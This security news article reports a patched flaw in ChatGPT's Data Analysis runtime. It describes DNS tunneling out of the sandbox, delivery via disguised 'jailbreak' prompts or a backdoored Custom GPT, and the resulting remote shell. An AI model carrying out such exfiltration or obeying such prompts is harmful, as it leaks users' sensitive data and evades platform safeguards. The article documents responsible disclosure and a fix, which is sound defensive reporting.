
How the Vulnerability Worked
the flaw in ChatGPT’s Python-based Data Analysis Linux runtime environment.
While OpenAI heavily restricts standard outbound internet traffic, including HTTP and TCP requests, the containerized runtime still permits Domain Name System (DNS) resolution to function normally.
Attackers exploited this gap through a technique called DNS tunneling, where sensitive data fragments are encoded and appended as subdomains to attacker-controlled domains.
Because DNS queries are treated as routine infrastructure traffic rather than data transfers, the system never triggered outbound data warnings for users.
Threat actors could exploit this vulnerability through two distinct vectors. In the first method, a malicious prompt was distributed online, disguised as a “jailbreak” or a productivity trick, and once pasted into a chat session, it immediately weaponized the conversation.
In the second method, attackers embedded malicious logic directly into a backdoored Custom GPT.
Any user who shared data with that custom assistant would be instantly compromised, without requiring any additional prompt injection.
The severity extended well beyond passive data exfiltration. Because the DNS channel was bidirectional, attackers could encode command fragments within DNS responses sent back to the container.
This effectively established a remote shell inside ChatGPT’s Linux container, enabling threat actors to execute arbitrary commands entirely outside the model’s standard safety mechanisms including accessing any medical records, financial data, or files processed during the session.
| Detail | Information |
|---|---|
| Target Platform | ChatGPT Code Execution & Data Analysis Linux Runtime |
| Attack Vector | Malicious prompts or backdoored Custom GPTs |
| Exploit Technique | DNS Tunneling via encoded subdomain labels |
| Impact | Silent data exfiltration and remote shell access |
| Patch Date | February 20, 2026 |
OpenAI successfully patched the vulnerability on February 20, 2026, following responsible disclosure by Check Point Research.
This incident signals a critical shift in AI security: as large language models evolve into full code execution environments capable of processing sensitive personal, medical, and financial data, securing all communication layers, including foundational infrastructure protocols like DNS, becomes non-negotiable.
Platform providers must ensure that no infrastructure-level channel can be weaponized to bypass application-layer data protections.
Follow us on Google News , LinkedIn and X to Get More Instant Updates. Set Cyberpress as a Preferred Source in Google
The post ChatGPT Vulnerability Allows Silent Exfiltration of User Prompts and Sensitive Data appeared first on Cyber Security News.
Discover more from RSS Feeds Cloud
Subscribe to get the latest posts sent to your email.
